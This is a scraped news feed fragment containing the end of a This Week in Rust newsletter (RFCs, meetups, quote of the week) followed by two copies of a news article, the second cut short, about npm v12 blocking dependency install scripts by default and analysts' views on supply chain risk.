<p>Changes to Rust follow the Rust <a href="https://github.com/rust-lang/rfcs#rust-rfcs">RFC (request for comments) process</a>. These
are the RFCs that were approved for implementation this week:</p>
<ul>
<li><a href="https://github.com/rust-lang/rfcs/pull/3808"><code>#![register_{attribute,lint}_tool]</code></a></li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#final-comment-period">Final Comment Period</a></h5>
<p>Every week, <a href="https://www.rust-lang.org/team.html">the team</a> announces the 'final comment period' for RFCs and key PRs
which are reaching a decision. Express your opinions now.</p>
<h6><a class="toclink" href="https://this-week-in-rust.org/atom.xml#tracking-issues-prs">Tracking Issues &amp; PRs</a></h6>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#rust"></a><a href="https://github.com/rust-lang/rust/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Rust</a>
<ul>
<li><a href="https://github.com/rust-lang/rust/pull/155421">Document panic in <code>RangeInclusive::from(legacy::RangeInclusive)</code></a></li>
<li><a href="https://github.com/rust-lang/rust/issues/116258">Tracking Issue for explicit-endian String::from_utf16</a></li>
<li><a href="https://github.com/rust-lang/rust/issues/126769">Tracking Issue for <code>substr_range</code> and related methods</a></li>
<li><a href="https://github.com/rust-lang/rust/issues/153990">Decide and document where stdarch intrinsics are allowed to diverge from asm behavior</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/155750">Document that <code>ManuallyDrop</code>'s Box interaction has been fixed</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/155739">Add temporary scope to assert_eq and assert_ne</a></li>
<li><a href="https://github.com/rust-lang/rust/issues/153863">Clean up crate type names to fix dylib vs staticlib confusion</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/156807">Add <code>T: PartialEq</code> bounds to derived <code>StructuralPartialEq</code> impls.</a></li>
<li><a href="https://github.com/rust-lang/rust/pull/157029">stabilize feature <code>float_algebraic</code></a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#compiler-team-mcps-only"></a><a href="https://github.com/rust-lang/compiler-team/issues?q=label%3Amajor-change%20label%3Afinal-comment-period%20state%3Aopen">Compiler Team</a> <a href="https://forge.rust-lang.org/compiler/mcp.html">(MCPs only)</a>
<ul>
<li><a href="https://github.com/rust-lang/compiler-team/issues/999">Deny todo!() in tidy</a></li>
</ul>
<a class="toclink" href="https://this-week-in-rust.org/atom.xml#leadership-council"></a><a href="https://github.com/rust-lang/leadership-council/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Leadership Council</a>
<ul>
<li><a href="https://github.com/rust-lang/leadership-council/issues/300">Rust All Hands 2027</a></li>
</ul>
<p><em>No Items entered Final Comment Period this week for
<a href="https://github.com/rust-lang/rfcs/issues?q=state%3Aopen%20label%3Afinal-comment-period%20state%3Aopen">Rust RFCs</a>,
<a href="https://github.com/rust-lang/cargo/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Cargo</a>,
<a href="https://github.com/rust-lang/lang-team/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Team</a>,
<a href="https://github.com/rust-lang/reference/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Language Reference</a> or
<a href="https://github.com/rust-lang/unsafe-code-guidelines/issues?q=is%3Aopen%20label%3Afinal-comment-period%20sort%3Aupdated-desc%20state%3Aopen">Unsafe Code Guidelines</a>.</em></p>
<p>Let us know if you would like your PRs, Tracking Issues or RFCs to be tracked as a part of this list.</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#new-and-updated-rfcs"></a><a href="https://github.com/rust-lang/rfcs/pulls">New and Updated RFCs</a></h5>
<ul>
<li><a href="https://github.com/rust-lang/rfcs/pull/3968">RFC for convenient, explicit closure capture using move($expr) expressions</a></li>
</ul>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#upcoming-events">Upcoming Events</a></h4>
<p>Rusty Events between 2026-06-10 - 2026-07-08 🦀</p>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#virtual">Virtual</a></h5>
<ul>
<li>2026-06-10 | Virtual (Girona, ES) | <a href="https://lu.ma/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/3bcnx1jb"><strong>Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-06-12 | Virtual (Kenya, KE) | <a href="https://luma.com/user/rustaceanskenya">RustaceansKenya</a><ul>
<li><a href="https://luma.com/vuxir9w8"><strong>RUST FOR CIVIC TECH</strong></a></li>
</ul>
</li>
<li>2026-06-16 | Virtual (Washington, DC, US) | <a href="https://www.meetup.com/rustdc">Rust DC</a><ul>
<li><a href="https://www.meetup.com/rustdc/events/314985751/"><strong>Mid-month Rustful</strong></a></li>
</ul>
</li>
<li>2026-06-17 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314000478/"><strong>Rust Study/Hack/Hang-out</strong></a></li>
</ul>
</li>
<li>2026-06-17 | Virtual (Girona, ES) | <a href="https://lu.ma/rust-girona">Rust Girona</a><ul>
<li><a href="https://luma.com/ekws5nr4"><strong>Weekly coding session</strong></a></li>
</ul>
</li>
<li>2026-06-18 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a><ul>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314236370/"><strong>June, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
</ul>
</li>
<li>2026-06-18 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/308455931/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-06-21 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/314329044/"><strong>Rust Deep Learning: Third Sunday</strong></a></li>
</ul>
</li>
<li>2026-06-23 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/310254779/"><strong>Fourth Tuesday</strong></a></li>
</ul>
</li>
<li>2026-06-23 | Virtual (London, UK) | <a href="https://www.meetup.com/women-in-rust">Women in Rust</a><ul>
<li><a href="https://www.meetup.com/women-in-rust/events/313767883/"><strong>Lunch &amp; Learn: What the heck are monads - and how do we fake them in Rust</strong></a></li>
</ul>
</li>
<li>2026-07-01 | Virtual (Indianapolis, IN, US) | <a href="https://www.meetup.com/indyrs">Indy Rust</a><ul>
<li><a href="https://www.meetup.com/indyrs/events/wqzhftyjckbcb/"><strong>Indy.rs - with Social Distancing</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Virtual (Berlin, DE) | <a href="https://www.meetup.com/rust-berlin/events/">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/308455932/"><strong>Rust Hack and Learn</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Virtual (Nürnberg, DE) | <a href="https://www.meetup.com/rust-noris/events/">Rust Nuremberg</a><ul>
<li><a href="https://www.meetup.com/rust-noris/events/313345243/"><strong>Rust Nürnberg online</strong></a></li>
</ul>
</li>
<li>2026-07-05 | Virtual (Dallas, TX, US) | <a href="https://www.meetup.com/dallasrust/events/">Dallas Rust User Meetup</a><ul>
<li><a href="https://www.meetup.com/dallasrust/events/314095287/"><strong>Rust Deep Learning: First Sunday</strong></a></li>
</ul>
</li>
<li>2026-07-07 | Virtual (London, GB) | <a href="https://www.meetup.com/women-in-rust/events/">Women in Rust</a><ul>
<li><a href="https://www.meetup.com/women-in-rust/events/315060981/"><strong>👋 Community Catch Up</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#europe">Europe</a></h5>
<ul>
<li>2026-06-10 | Köln, DE | <a href="https://www.meetup.com/rust-cologne-bonn/events/">Rust Cologne</a><ul>
<li><a href="https://www.meetup.com/rustcologne/events/315090338/"><strong>Rust in June: Speedy Rust</strong></a></li>
</ul>
</li>
<li>2026-06-10 | München, DE | <a href="https://www.meetup.com/rust-munich">Rust Munich</a><ul>
<li><a href="https://www.meetup.com/rust-munich/events/313791798/"><strong>Rust Munich 2026 / 2 - Hacking Evening</strong></a></li>
</ul>
</li>
<li>2026-06-11 | Berlin, DE | <a href="https://www.meetup.com/rust-berlin/events/">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/315088919/"><strong>Rust Berlin on location 🏳️‍🌈 - Edition 014</strong></a></li>
</ul>
</li>
<li>2026-06-11 | Switzerland, CH | <a href="https://www.posttenebraslab.ch/wiki/events/start">PostTenebrasLab</a><ul>
<li><a href="https://www.posttenebraslab.ch/wiki/events/monthly_meeting/rust_meetup"><strong>Rust Meetup Geneva</strong></a></li>
</ul>
</li>
<li>2026-06-12 - 2026-06-14 | Kraków, PL | <a href="https://rustmeet.eu/">Rustmeet</a><ul>
<li><a href="https://rustmeet.eu/"><strong>Rustmeet</strong></a></li>
</ul>
</li>
<li>2026-06-16 | Leipzig, DE | <a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig">Rust - Modern Systems Programming in Leipzig</a><ul>
<li><a href="https://www.meetup.com/rust-modern-systems-programming-in-leipzig/events/313813937/"><strong>Interactive: Everything is Open Source</strong></a></li>
</ul>
</li>
<li>2026-06-16 | Milano, IT | <a href="https://www.meetup.com/rust-language-milano">Rust Language Milan</a><ul>
<li><a href="https://www.meetup.com/rust-language-milan/events/314766950/"><strong>Real-time planning in Rust: SolverForge &amp; SERIO</strong></a></li>
</ul>
</li>
<li>2026-06-18 | Aarhus, DK | <a href="https://www.meetup.com/rust-aarhus">Rust Aarhus</a><ul>
<li><a href="https://www.meetup.com/rust-aarhus/events/314965238/"><strong>Talk Night at Danske Commodities</strong></a></li>
</ul>
</li>
<li>2026-06-18 | Barcelona, ES | <a href="https://www.meetup.com/bcnrust/events/">BcnRust</a><ul>
<li><a href="https://www.meetup.com/bcnrust/events/315094938/"><strong>21st BcnRust Meetup</strong></a></li>
</ul>
</li>
<li>2026-06-19 | Dresden, DE | <a href="https://github.com/rust-dresden">Rust Dresden</a><ul>
<li><a href="https://pretix.eu/rust-dresden/on-location-2"><strong>Second Meetup</strong></a></li>
</ul>
</li>
<li>2026-06-23 | Paris, FR | <a href="https://www.meetup.com/rust-paris">Rust Paris</a><ul>
<li><a href="https://www.meetup.com/rust-paris/events/315040676/"><strong>Rust meetup #86</strong></a></li>
</ul>
</li>
<li>2026-06-23 | Warsaw, PL | <a href="https://luma.com/rust.in.warsaw">Rust Warsaw</a><ul>
<li><a href="https://luma.com/djs7ntfx"><strong>Rust Warsaw Meetup: June 2026</strong></a></li>
</ul>
</li>
<li>2026-06-25 | Berlin, DE | <a href="https://www.meetup.com/rust-berlin">Rust Berlin</a><ul>
<li><a href="https://www.meetup.com/rust-berlin/events/314396600/"><strong>Rust Berlin Talks: The next generation</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Edinburgh, GB | <a href="https://www.meetup.com/rust-edi/events/">Rust and Friends</a><ul>
<li><a href="https://www.meetup.com/rust-and-friends/events/314941098/"><strong>Bevy, Bits, &amp; Cats (Rust July Talks)</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Enschede, OV, NL | <a href="https://www.meetup.com/dutch-rust-meetup/events/">Baseflow Tech Meetups</a><ul>
<li><a href="https://www.meetup.com/baseflow-tech-meetups/events/315099547/"><strong>AI Summit</strong></a></li>
</ul>
</li>
<li>2026-07-08 | Dublin, IE | <a href="https://www.meetup.com/rust-dublin/events/">Rust Dublin</a><ul>
<li><a href="https://www.meetup.com/rust-dublin/events/315150327/"><strong>Join us live and INPERSON for Rust 261</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#north-america">North America</a></h5>
<ul>
<li>2026-06-11 | Lehi, UT, US | <a href="https://www.meetup.com/utah-rust">Utah Rust</a><ul>
<li><a href="https://www.meetup.com/utah-rust/events/314696643/"><strong>Utah Rust June Meetup</strong></a></li>
</ul>
</li>
<li>2026-06-11 | Mountain View, CA, US | <a href="https://www.meetup.com/hackerdojo/events/">Hacker Dojo</a><ul>
<li><a href="https://www.meetup.com/hackerdojo/events/314825006/"><strong>RUST MEETUP at HACKER DOJO</strong></a></li>
</ul>
</li>
<li>2026-06-11 | San Diego, CA, US | <a href="https://www.meetup.com/san-diego-rust">San Diego Rust</a><ul>
<li><a href="https://www.meetup.com/san-diego-rust/events/313721899/"><strong>San Diego Rust June Meetup - Back in person!</strong></a></li>
</ul>
</li>
<li>2026-06-16 | San Francisco, CA, US | <a href="https://www.meetup.com/san-francisco-rust-study-group">San Francisco Rust Study Group</a><ul>
<li><a href="https://www.meetup.com/san-francisco-rust-study-group/events/314989012/"><strong>Rust Hacking in Person</strong></a></li>
</ul>
</li>
<li>2026-06-16 | San Francisco, CA, US | <a href="https://www.meetup.com/san-francisco-rust-study-group">San Francisco Rust Study Group</a><ul>
<li><a href="https://www.meetup.com/san-francisco-rust-study-group/events/ghhwqtyjcjbvb/"><strong>Rust Hacking in Person</strong></a></li>
</ul>
</li>
<li>2026-06-17 | Hybrid (Vancouver, BC, CA) | <a href="https://www.meetup.com/vancouver-rust">Vancouver Rust</a><ul>
<li><a href="https://www.meetup.com/vancouver-rust/events/314000478/"><strong>Rust Study/Hack/Hang-out</strong></a></li>
</ul>
</li>
<li>2026-06-18 | Hybrid (Seattle, WA, US) | <a href="https://www.meetup.com/join-srug">Seattle Rust User Group</a><ul>
<li><a href="https://www.meetup.com/seattle-rust-user-group/events/314236370/"><strong>June, 2026 SRUG (Seattle Rust User Group) Meetup</strong></a></li>
</ul>
</li>
<li>2026-06-24 | Austin, TX, US | <a href="https://www.meetup.com/rust-atx">Rust ATX</a><ul>
<li><a href="https://www.meetup.com/rust-atx/events/xvkdgtyjcjbgc/"><strong>Rust Lunch - Fareground</strong></a></li>
</ul>
</li>
<li>2026-06-24 | Los Angeles, CA, US | <a href="https://www.meetup.com/rust-los-angeles">Rust Los Angeles</a><ul>
<li><a href="https://www.meetup.com/rust-los-angeles/events/314386080/"><strong>Rust LA: Rust-Based Constraint Solvers in 2D Sketching with Zoo Technologies</strong></a></li>
</ul>
</li>
<li>2026-06-25 | Atlanta, GA, US | <a href="https://www.meetup.com/rust-atl">Rust Atlanta</a><ul>
<li><a href="https://www.meetup.com/rust-atl/events/313539326/"><strong>Rust-Atl</strong></a></li>
</ul>
</li>
<li>2026-06-26 | New York, NY, US | <a href="https://www.meetup.com/rust-nyc">Rust NYC</a><ul>
<li><a href="https://www.meetup.com/rust-nyc/events/315014582/"><strong>Rust NYC's Big Summer Social</strong></a></li>
</ul>
</li>
<li>2026-07-02 | Saint Louis, MO, US | <a href="https://www.meetup.com/stl-rust/events/">STL Rust</a><ul>
<li><a href="https://www.meetup.com/stl-rust/events/315103359/"><strong>Git is easy?</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#oceania">Oceania</a></h5>
<ul>
<li>2026-06-11 | Brisbane City, QL, AU | <a href="https://www.meetup.com/rust-brisbane/events/">Rust Brisbane</a><ul>
<li><a href="https://www.meetup.com/rust-brisbane/events/315092980/"><strong>Rust Brisbane • June 2026</strong></a></li>
</ul>
</li>
<li>2026-06-25 | Melbourne, AU | <a href="https://www.meetup.com/rust-melbourne">Rust Melbourne</a><ul>
<li><a href="https://www.meetup.com/rust-melbourne/events/315039461/"><strong>Rust Melbourne June 2026</strong></a></li>
</ul>
</li>
</ul>
<h5><a class="toclink" href="https://this-week-in-rust.org/atom.xml#south-america">South America</a></h5>
<ul>
<li>2026-06-18 | Florianópolis, BR | <a href="https://luma.com/rust-sc">Rust SC</a><ul>
<li><a href="https://luma.com/acinctdf"><strong>Rust Floripa</strong></a></li>
</ul>
</li>
</ul>
<p>If you are running a Rust event please add it to the <a href="https://www.google.com/calendar/embed?src=apd9vmbc22egenmtu5l6c5jbfc%40group.calendar.google.com">calendar</a> to get
it mentioned here. Please remember to add a link to the event too.
Email the <a href="mailto:community-team@rust-lang.org">Rust Community Team</a> for access.</p>
<h4><a class="toclink" href="https://this-week-in-rust.org/atom.xml#jobs">Jobs</a></h4>
<p>Please see the latest <a href="https://www.reddit.com/r/rust/comments/1ttbtf5/official_rrust_whos_hiring_thread_for_jobseekers/">Who's Hiring thread on r/rust</a></p>
<h3><a class="toclink" href="https://this-week-in-rust.org/atom.xml#quote-of-the-week">Quote of the Week</a></h3>
<blockquote>
<p>It's a footgun, yes, but it's a sound footgun.</p>
</blockquote>
<p>– <a href="https://github.com/rust-lang/rust/pull/155750#discussion_r3356323620">Prof. Dr. Ralf Jung on github</a></p>
<p>Thanks to <a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328/1779">Theemathas</a> for the suggestion!</p>
<p><a href="https://users.rust-lang.org/t/twir-quote-of-the-week/328">Please submit quotes and vote for next week!</a></p>
<p>This Week in Rust is edited by:</p>
<ul>
<li><a href="https://github.com/nellshamrell">nellshamrell</a></li>
<li><a href="https://github.com/llogiq">llogiq</a></li>
<li><a href="https://github.com/ericseppanen">ericseppanen</a></li>
<li><a href="https://github.com/extrawurst">extrawurst</a></li>
<li><a href="https://github.com/U007D">U007D</a></li>
<li><a href="https://github.com/mariannegoldin">mariannegoldin</a></li>
<li><a href="https://github.com/bdillo">bdillo</a></li>
<li><a href="https://github.com/opeolluwa">opeolluwa</a></li>
<li><a href="https://github.com/bnchi">bnchi</a></li>
<li><a href="https://github.com/KannanPalani57">KannanPalani57</a></li>
<li><a href="https://github.com/tzilist">tzilist</a></li>
</ul>
<p><em>Email list hosting is sponsored by <a href="https://foundation.rust-lang.org/">The Rust Foundation</a></em></p>
<p><small><a href="https://www.reddit.com/r/rust/comments/1u2rz3a/this_week_in_rust_655/">Discuss on r/rust</a></small></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[GitHub finally pulls the plug on automatic install script execution for npm]]></title>
<description><![CDATA[The ability for attackers to leverage automatic install script execution in npm will finally come to an end when expected changes arrive from GitHub in July. Coders will still be able to enable the function, but the default setting will block it. 



In V12, default settings are changing, GitHub ...]]></description>
<link>https://tsecurity.de/de/3589314/ai-nachrichten/github-finally-pulls-the-plug-on-automatic-install-script-execution-for-npm/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589314/ai-nachrichten/github-finally-pulls-the-plug-on-automatic-install-script-execution-for-npm/</guid>
<pubDate>Thu, 11 Jun 2026 03:18:37 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The ability for attackers to leverage automatic install script execution in npm will finally come to an end when expected changes arrive from GitHub in July. Coders will still be able to enable the function, but the default setting will block it. </p>



<p>In V12, default settings are changing, <a href="https://github.blog/changelog/2026-06-09-upcoming-breaking-changes-for-npm-v12/" target="_blank" rel="noreferrer noopener">GitHub said in its changelog</a>, noting, “it turns an npm install behavior that runs automatically today into one you explicitly opt into.” </p>



<p>Specifically, the post said, “allowScripts defaults to off: npm install will no longer execute preinstall, install or postinstall scripts from dependencies unless they are explicitly allowed in your project. This includes native node-gyp builds; a package with a binding.gyp and no explicit install script still gets blocked, because npm runs an implicit node-gyp rebuild for it. Prepare scripts from git, file, and link dependencies are blocked the same way.”</p>



<p>Analysts, consultants, and users generally applauded the change, but said that it would only narrow the exposure to supply chain attacks instead of eliminating it. </p>



<h2 class="wp-block-heading">Attacks likely to move elsewhere</h2>



<p><a href="https://www.linkedin.com/in/sonu-kapoor/" target="_blank" rel="noreferrer noopener">Sonu Kapoor</a>, maintainer for CVE Lite CLI in the OWASP Incubator Project, said that this change is likely to force the supply chain attacks that leveraged the automatic execution to move elsewhere.</p>



<p>“This does not eliminate npm supply chain risk, it removes a major automatic execution path,” Kapoor said. “Attackers can still move to other paths: malicious package code that runs at application runtime, compromised maintainer accounts, dependency confusion, typo-squatting, poisoned GitHub Actions workflows, malicious transitive dependencies, or stolen publishing tokens. This closes one very dangerous door, but it does not secure the whole house.”</p>



<p>Still, <a href="https://www.infoworld.com/article/4179874/infected-red-hat-npm-packages-expose-developer-credentials-2.html" target="_blank">attacks leveraging the setting </a>have been regularly used in supply chain attacks. </p>



<p>However <a href="https://www.linkedin.com/in/agparkinson/" target="_blank" rel="noreferrer noopener">Alan Parkinson</a>, director of secure medical device firm Threat Detective, said more sophisticated attackers have already moved beyond this hole. </p>



<p>“The install script attack vector has been known for years,” Parkinson said. “Most security teams marked it as low risk and moved on to higher risk threats. What raised its profile wasn’t the technical exploitability changing, it was a run of high-profile victims and some threat actors openly chasing notoriety.”</p>



<p>He added, “the pre and post install scripts was never a clever attack vector to begin with. Running code from an install hook is crude and noisy, which is why it caused such visible damage. The more capable actors are already moving to other methods, so v12 mainly shuts the door on less sophisticated threat actors.”</p>



<p>Although GitHub declined an interview, <a href="https://github.com/steiza" target="_blank" rel="noreferrer noopener">Zach Steindler</a>, a GitHub principal engineer, answered InfoWorld’s questions by email. He said the volume and pace of supply chain attacks forced the default settings change. </p>



<p>“We’ve seen attackers target these capabilities to quickly propagate attacks from one compromised package to many. Years of security and usability research have shown that it’s not enough to make secure functionality available; the secure path has to be the default in order for it to be widely adopted,” Steindler said. </p>



<p>He added, “we believe that these changes are a great way to provide high impact secure defaults while still providing the option for some users to fall back on functionality they might need in some circumstances.”</p>



<h2 class="wp-block-heading">Change overdue</h2>



<p><a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research, said that GitHub was the last of the repositories to make the setting default change. “Rivals moved first: Yarn, pnpm and Bun all block third party install scripts by default in their own ways,” Gogia said. “Npm is not inventing a new doctrine. It is finally adopting one.”</p>



<p>Steindler didn’t dispute Gogia’s comment. </p>



<p><strong>“</strong>It’s not easy being the stewards of the largest package repository in the world. Community consensus on what security capabilities should be standard, and when it’s okay to make breaking changes shifts over time. From our continual conversations with the community, it was clear it was time to make this change,” Steindler said. </p>



<p>“The recent attacks are alarming,” he noted, “but stewarding these package repositories is a multi-decade effort, not just a moment in time. As attacks evolve, so will our defensive security capabilities. We’re in this for the long haul.”</p>



<p>Gogia said that the change, although overdue, is a good one. </p>



<p>“Npm is removing one of the most comfortable hiding places for software supply chain risk: code that executes the moment a developer types install,” Gogia said. “With npm v12, execution becomes something that must be approved, recorded in the project, and committed for review. That is not a design adjustment. It is a change in control philosophy.”</p>



<h2 class="wp-block-heading">Bad defaults become infrastructure</h2>



<p>Gogia had his own take on why GitHub waited so long.</p>



<p>“Npm waited because its risky default acquired a constituency. As far back as 2016, npm’s own position was that the convenience of install scripts outweighed the worm risk, with an opt-out flag for the cautious. The trade-off was a documented product decision, not an oversight,” he said. </p>



<p>“The trouble with bad defaults is that they become infrastructure,” he added. “Native module builds, browser installers such as Playwright and Cypress, Electron download flows and Husky hooks all grew around automatic execution. Turning it off became less a technical adjustment and more a constitutional reform.”</p>



<h2 class="wp-block-heading">Liability changed hands</h2>



<p>The real pressure for the change, however, came from regulators.</p>



<p>“The deeper answer is that the liability changed hands. Once regulation such as the EU Cyber Resilience Act and securities disclosure rules placed supply chain failure on corporate balance sheets, a documented unsafe default became indefensible,” Gogia said. </p>



<p>Kapoor agreed that long-used procedures enabled this security hole to survive longer than it should have. </p>



<p>“The reason this likely was not done long ago is compatibility,” he said. “Install scripts are not only used by attackers. Many legitimate packages use them to compile native modules, download platform-specific binaries, generate files, or complete setup steps. Changing the default breaks assumptions that have existed in the npm ecosystem for years. That is why these security changes often arrive slowly. The safer default is obvious from a security perspective, but painful from an ecosystem compatibility perspective.”</p>



<p>In addition, he noted, “the bigger point is that package managers are moving from implicit trust to explicit trust. That is the right direction. Developers should have to approve which dependencies are allowed to execute code during install. But approval cannot become a blind checkbox. Teams need visibility into which package wants to run a script, whether it is direct or transitive, why it is there, and whether it belongs in the project at all.”</p>



<p>Kapoor added that this change matters because install-time execution often happens in privileged environments with access to tokens, secrets, internal registries, build artifacts, or deployment paths. “Even if the script does not compromise production directly, it may be able to steal enough context to support the next stage of an attack,” he said.</p>



<h2 class="wp-block-heading">Value in the pain</h2>



<p>Cybersecurity consultant <a href="https://formergov.com/directory/brianlevine" target="_blank" rel="noreferrer noopener">Brian Levine</a>, executive director of FormerGov, agreed that the closing of this security hole is a very good thing. </p>



<p>“It seems like virtually every major supply chain attack of the last decade has had the same original sin: code that ran automatically because the ecosystem let it. Npm finally closing that door by default is overdue, but it’s genuinely significant. This is the package manager for hundreds of billions of downloads a month,” Levine said. </p>



<p>“When npm changes its defaults, it changes the security posture of practically every enterprise dev environment on the planet. It may have been the last large code repository to still allow this kind of automated execution.”</p>



<p>Levine added that this change might not merely stop a security hole, but the new process may meaningfully improve security. </p>



<p>“There’s actually something valuable buried in this migration pain. Having developers explicitly approve which packages can run code and commit that list to source control is a form of software supply chain governance that many organizations never had,” Levine said. “It creates an auditable record which is meaningful, especially for regulated industries.”</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[GitHub finally pulls the plug on automatic install script execution for npm]]></title>
<description><![CDATA[The ability for attackers to leverage automatic install script execution in npm will finally come to an end when expected changes arrive from GitHub in July. Coders will still be able to enable the function, but the default setting will block it. 



In V12, default settings are changing, GitHub ...]]></description>
<link>https://tsecurity.de/de/3589299/it-security-nachrichten/github-finally-pulls-the-plug-on-automatic-install-script-execution-for-npm/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589299/it-security-nachrichten/github-finally-pulls-the-plug-on-automatic-install-script-execution-for-npm/</guid>
<pubDate>Thu, 11 Jun 2026 03:08:03 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The ability for attackers to leverage automatic install script execution in npm will finally come to an end when expected changes arrive from GitHub in July. Coders will still be able to enable the function, but the default setting will block it. </p>



<p>In V12, default settings are changing, <a href="https://github.blog/changelog/2026-06-09-upcoming-breaking-changes-for-npm-v12/" target="_blank" rel="noreferrer noopener">GitHub said in its changelog</a>, noting, “it turns an npm install behavior that runs automatically today into one you explicitly opt into.” </p>



<p>Specifically, the post said, “allowScripts defaults to off: npm install will no longer execute preinstall, install or postinstall scripts from dependencies unless they are explicitly allowed in your project. This includes native node-gyp builds; a package with a binding.gyp and no explicit install script still gets blocked, because npm runs an implicit node-gyp rebuild for it. Prepare scripts from git, file, and link dependencies are blocked the same way.”</p>



<p>Analysts, consultants, and users generally applauded the change, but said that it would only narrow the exposure to supply chain attacks instead of eliminating it. </p>



<h2 class="wp-block-heading">Attacks likely to move elsewhere</h2>



<p><a href="https://www.linkedin.com/in/sonu-kapoor/" target="_blank" rel="noreferrer noopener">Sonu Kapoor</a>, maintainer for CVE Lite CLI in the OWASP Incubator Project, said that this change is likely to force the supply chain attacks that leveraged the automatic execution to move elsewhere.</p>



<p>“This does not eliminate npm supply chain risk, it removes a major automatic execution path,” Kapoor said. “Attackers can still move to other paths: malicious package code that runs at application runtime, compromised maintainer accounts, dependency confusion, typo-squatting, poisoned GitHub Actions workflows, malicious transitive dependencies, or stolen publishing tokens. This closes one very dangerous door, but it does not secure the whole house.”</p>



<p>Still, <a href="https://www.infoworld.com/article/4179874/infected-red-hat-npm-packages-expose-developer-credentials-2.html" target="_blank">attacks leveraging the setting </a>have been regularly used in supply chain attacks. </p>



<p>However <a href="https://www.linkedin.com/in/agparkinson/" target="_blank" rel="noreferrer noopener">Alan Parkinson</a>, director of secure medical device firm Threat Detective, said more sophisticated attackers have already moved beyond this hole. </p>



<p>“The install script attack vector has been known for years,” Parkinson said. “Most security teams marked it as low risk and moved on to higher risk threats. What raised its profile wasn’t the technical exploitability changing, it was a run of high-profile victims and some threat actors openly chasing notoriety.”</p>



<p>He added, “the pre and post install scripts was never a clever attack vector to begin with. Running code from an install hook is crude and noisy, which is why it caused such visible damage. The more capable actors are already moving to other methods, so v12 mainly shuts the door on less sophisticated threat actors.”</p>



<p>Although GitHub declined an interview, <a href="https://github.com/steiza" target="_blank" rel="noreferrer noopener">Zach Steindler</a>, a GitHub principal engineer, answered questions by email. He said the volume and pace of supply chain attacks forced the default settings change. </p>



<p>“We’ve seen attackers target these capabilities to quickly propagate attacks from one compromised package to many. Years of security and usability research have shown that it’s not enough to make secure functionality available; the secure path has to be the default in order for it to be widely adopted,” Steindler said. </p>



<p>He added, “we believe that these changes are a great way to provide high impact secure defaults while still providing the option for some users to fall back on functionality they might need in some circumstances.”</p>



<h2 class="wp-block-heading">Change overdue</h2>



<p><a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, chief analyst at Greyhound Research, said that GitHub was the last of the repositories to make the setting default change. “Rivals moved first: Yarn, pnpm and Bun all block third party install scripts by default in their own ways,” Gogia said. “Npm is not inventing a new doctrine. It is finally adopting one.”</p>



<p>Steindler didn’t dispute Gogia’s comment. </p>



